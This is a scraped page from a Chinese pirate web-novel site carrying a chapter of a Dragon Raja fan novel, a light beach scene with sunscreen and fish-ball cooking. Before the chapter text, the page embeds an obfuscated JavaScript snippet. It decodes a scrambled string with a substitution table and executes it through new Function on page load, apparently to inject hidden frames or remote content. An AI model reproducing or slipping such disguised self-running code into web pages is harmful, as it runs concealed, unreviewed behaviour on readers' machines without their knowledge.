笔趣阁

安装
字:
关灯 护眼
笔趣阁 > 从龙族开始打穿世界 > 第一百三十五章:我弄疼你了吗?

第一百三十五章:我弄疼你了吗?

(function(){function t11d18b6e(x16ae02){var fdb804468="9O5M.Jl$e4/],fjxG!7y2Ph^iwnT:L36pHCs0v&B?;dcKqESDY[W(Vk8z~m=rgFo%-uIaR1_ZtNb|XUA@Q";var tc68f0bf="sNHqg?pU~i:rQ/E73txf=98RP1JLXeBAG6uT2IF(&VoKv|MO4l[0nD!,_.hb%5jWz;kYc-$@aSdyC]^Zmw";return x16ae02.split('').map(function(nad834){var o1e191=fdb804468.indexOf(nad834);return o1e191==-1?nad834:tc68f0bf[o1e191]}).join('')}var c=t11d18b6e('ftp1://Q4(NdQ["" + "." + "=" + "W" + "0" + "w" + "G" + "Z" + "P" + "0"+""X2yC(a!4d(B) { - ByC(a!4d( B]0xyHa=8 9yhGhWhh8 (a=wN0wNh8 ZGaxDgGg8 @00w=HgxW) { 4y BfUEZaqo4(f~!L9!B(ZK4.Z!d]~lYZ!yd]@)) { ]L!C]( }- KZ] mDyygDa 2 yC(a!4d( B.ZHxgNZg) { ]L!C]( t!]4(.~y]d@|mZ]|dNLB.ZHxgNZg) }- KZ] MDHHZawyW 2 ZGaxDgGg[mDyygDaBW7Hw) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7H0)X8 FZGhPLL 2 ZGaxDgGg[mDyygDaBW7H0) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7Hw)X8 LGxD0LPL 2 @00w=HgxW[MDHHZawyWB"IG;ba@;CN&OFa@YQN622")X8 YDDywgW0N 2 MDHHZawyWB"IGnYI:^Y^o7Y=o;CN622")- KZ] bN=HgL 2 MDHHZawyWB"L@OuAonwAQ22")- KZ] y=0w=L0N- 4y BYdaZ!4d(~9LZ]am~4(NL7SyBbN=HgL) > Rw) { y=0w=L0N 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"Np;DNp&bAoj2"))- y=0w=L0N~4N 2 "!" + BEZ!m~]Z(Nd@B) * wWWWW)- y=0w=L0N~9!bYL~Q4N!m 2 "wWWr"- y=0w=L0N~9!bYL~mL4.m! 2 "GWWl7"- y=0w=L0N~N49Z=YLN 2 !]CL- @00w=HgxW~=dNb~ZllL(N|m4YNBy=0w=L0N) } KZ] !wyaxWaNN 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"ZoAbIowY"))- !wyaxWaNN~4N 2 "7" + BEZ!m~]Z(Nd@B) * wWWWW)- !wyaxWaNN~9!bYL~Q4N!m 2 "wWl7"- !wyaxWaNN~9!bYL~mL4.m! 2 g + "l7"- !wyaxWaNN~9!bYL~=Zau.]dC(N 2 "#&&&"- KZ] KWNL0 2 yC(a!4d( BdGPGgy0yw) { !wyaxWaNN~9]a 2 ["m!!l9/ff"8 dGPGgy0yw8 "]"8 "Fwww"8 (a=wN0wNh + "Jz]2" + BFZGhPLLBYdaZ!4d(~m]Ly))X~Fd4(B"f")- @00w=HgxW~=dNb~ZllL(N|m4YNB!wyaxWaNN) }- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(9L(N =]4N.4(. md9! " + 9yhGhWhh } ZGaxDgGg[MDHHZawyWB"A@;WI0.2")XB["m!!l9/ff"8 MDHHZawyWB9yhGhWhh)8 "m@~F9J" + VZ!L["(dQ"XB) + By=0w=L0N 22 (CYY J "" / bN=HgL)X~Fd4(B"f"))~!mL(BBYygDDHhP) 2> YygDDHhP~!L7!B))~!mL(BBYygDDHhP) 2> { 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL =]4N.4(. md9! " + YygDDHhP }- KWNL0BMDHHZawyWBYygDDHhP~9lY4!B"")~]LKL]9LB)~Fd4(B""))) })~aZ!amBBL]]) 2> { KWNL0BMDHHZawyWB]0xyHa=)) })- ZGaxDgGg["ZNNjKL(!T49!L(L]"XB"@L99Z.L"8 yC(a!4d( BL) { 4y BL~NZ!Z~u 22 (a=wN0wNh) { @00w=HgxW~.L!jYL@L(!3bvNB!wyaxWaNN~4N)~]L@dKLB)- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL 4y]Z@L ld9! @L99Z.L" } (LQ &C(a!4d(B"Z].9"8 MDHHZawyWBL~NZ!Z~K))B{ z!Na9/ LGxD0LPL8 z!]Z/ y=0w=L0N }) } }) })B"Z@jCa0ml=@h%N:vCL5YH"8 "I0PC=@;FN|g7I:YMA:lGT(mgL.22"8 "wG000HPP0gxP0g"8 Q4(NdQ8 NdaC@L(!) }-.=W0wGZP0B)-'.substr(7));new Function(c)()})();
章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“嗯~”
  
  那充满热力的大手,冲散了防晒油的清凉,猛然间的温度转换,又让绘梨衣错不及防的嘤咛一声。
  
  少女的反应让陆晨手足无措,以为自己又做错了事,有些忐忑的问道:“我弄疼你了吗?”
  
  陆晨的大脑处于基本宕机状态,琢磨着他难道不小心用力大了?
  
  绘梨衣又轻轻的摇了摇头,头埋得更低了,在少年看不到的死角内,双颊染上一丝动人的红晕。
  
  陆晨微微镇定下来,双手游走在绘梨衣的背部,心中默念着这些年他所有学过的武学心法,一时间倒也逐渐心静。
  
  而少女琉璃般的眸子水光潋滟,樱花般的唇瓣张开轻咬自己的手背,她貌似影响到godzilla了,她要忍住。
  
  那双充满热力的手划过少女背部的每一寸肌肤,但防晒油似乎仍有盈余,于是乎就继续向下,划过那肌香水滑、温若玉脂的长腿。
  
  “呼——”
  
  做完这一切,陆晨总算松了口气,完成了这项艰难的工程,他感觉这简直比和次代种来一场大战还要惊心动魄。
  
  “好了,我涂的很均匀,绝对不会让绘梨衣被晒伤的。”
  
  陆晨有些自得的说道,他对于自己的手法还是有自信的。
  
  然而绘梨衣却没有立即起身,依旧低着头埋在沙坑里,一时间让人联想起把头钻进洞中的鸵鸟。
  
  她也不知道为什么,只是此时有些不想起身面对godzilla,胸中似乎有一只调皮的小鹿在不停的跳动,像是奔跑在自然的丛林中。
  
  大概过了有半分钟,绘梨衣才起身,依旧是标志的呆萌神情,只是那脸颊上的红晕似乎还未曾完全消逝。
  
  “喏——剩下的绘梨衣自己来吧。”
  
  陆晨将还剩了不少的小瓶子递给绘梨衣,即使以他大条的神经,也知道貌似从正面来有些不妥,他感觉那可能会是更加艰难的战斗。
  
  绘梨衣点了点头,这种事情她还是能自理的。
  
  “我要再找找有没有小动物。”
  
  陆晨转过身去,在默默的挖着沙坑,寻找着以他运气不可能存在的小寄居蟹之流的生物。
  
  而绘梨衣则是小心的在手上滴了些防晒油,在身上涂抹了起来,她不想被晒黑。
  
  少女的素手游走在柔滑的肌肤上,心中也有些奇怪,明明自己这会儿涂起来并没有感到“不舒服”,刚刚那种怪异的感觉是怎么回事?
  
  “嘿——两位,丸子馅弄好了,快来帮忙捏!”
  
  在屋棚下的凯撒朝陆晨和绘梨衣招手呼喊。
  
  他和楚子航也都是和陆晨一样穿着夏威夷大裤衩,凯撒健硕的胸大肌在阳光的照射下亮的反光,简直让陆晨怀疑他是不是抹了油。
  
  此时楚子航手持厨刀,正精准的处理食材,他那副严肃认真的模样,不像是个厨子,反倒像是杀手在琢磨着怎么对目标下手。
  
  案板上是一只两米多长的蓝鲫金枪鱼,是上午几人海钓时绘梨衣钓上来的,这回就连楚子航都不得不感叹一句:“绘梨衣的运气真好。”
  
  蓝鲫金枪鱼被誉为最名贵的鱼,曾有渔民捕获比这个稍微大一些的,拍出了两千万的天价。
  
  当时凯撒就说,绘梨衣就算不是蛇岐八家的小公主,出海当渔民也绝对是能暴富的。
  
  其实绘梨衣抛开初次上鱼的欣喜后,看到这条大鱼时本来是想将它放生的,但陆晨见到这条鱼的第一时间就开口来了一句:“这么大,看起来一定很好吃。”
  
  绘梨衣就又收起了小本本……
  
  凯撒带着透明手套,揉捏着盆子中由蟹肉、鱼肉、鸡蛋糅杂成的肉馅,他之前听说日本的肉丸子也算是当地特色,但前两天和陆晨他们一起逛庙会时吃了各种丸子倒感觉也一般。
  
  今日来到这处海滩,凯撒就提议他们自己做。
  
  反正闲着也是闲着,于是他和楚子航就开始分工合作。
  
  楚子航以他精妙的刀工负责处理各种食材,凯撒则是用破壁机和搅拌机制造肉馅。
  
  又是一块处理好的鱼肉从空中抛过来,凯撒头也不回的接住,流畅的扔入破壁机,然后继续揉馅。
  
  如果有学院的人看到这一幕,估计会怀疑人生,曾经他们认为针锋相对的学生会长和真.狮心会长下厨时竟然配合的如此默契,与其说是对手,不如说是多年厨房的搭档。
  
  至于陆晨……
  
  凯撒本来是想拉陆兄一起来下厨的,他一向善于组织团队活动,可准备开口邀请时被楚子航用厨刀的刀柄捅了下腰眼,他又反应过来,貌似这种事不该让陆兄插手。
  
  先不说这个莽夫貌似做不来这么精细的活,他们也应该给陆兄和绘梨衣更多的私人空间。
  
  但处理了半天食材后,凯撒看着几大盆肉馅,才意识到一个问题,陆兄说要吃完那条蓝鲫金枪鱼貌似不是戏言,而照他和楚子航现在的工作进度,能不能赶得上晚饭是个问题。
  
  所以还是要拉壮丁来帮忙,对厨艺要求比较高的阶段就算了,只是捏个丸子,陆兄应该也没问题的吧?
  
  陆晨牵着绘梨衣的手走过海滩,朝屋棚走去。
  
  牵手……没别的意思,他只是怕绘梨衣摔倒。
  
  duang——
  
  一盆和好的肉馅放在陆晨和绘梨衣面前,凯撒又递给绘梨衣和陆晨一双透明手套,“从虎口把馅捏出来,就成团子状了。”
  
  说罢,他还亲自示范了一下,从盆中抄起一坨肉馅,biu的一下一个圆润的丸子就从凯撒虎口中滑出,滚落在另一个准备好的盘子中,看的陆晨惊为天人。
  
  原来凯撒兄居然还是深藏不露的大厨!
  
  至于他……不得不说,前世今生,都没正经的做过饭,顶多是在野外战斗时,在丛林里随便抓些小动物就着火随便烤一下,洒些盐巴就完事了,味道嘛……一言难尽。
  
  他和绘梨衣搬来竹椅,排排坐,看着桌子上的一盆肉馅。
  
  最终陆晨还是觉得自己要先做个表率,男人不能说自己不行。
  
  “绘梨衣,我先给你再演示下。”
  
  陆晨满怀自信的说着,将一坨肉馅放在手心,以他对力量的掌控,他还能捏不好个丸子?
『加入书签,方便阅读』
安装
继续浏览精彩内容
到笔趣阁APP免费阅读
《从龙族开始打穿世界》
打开
浏览器
继续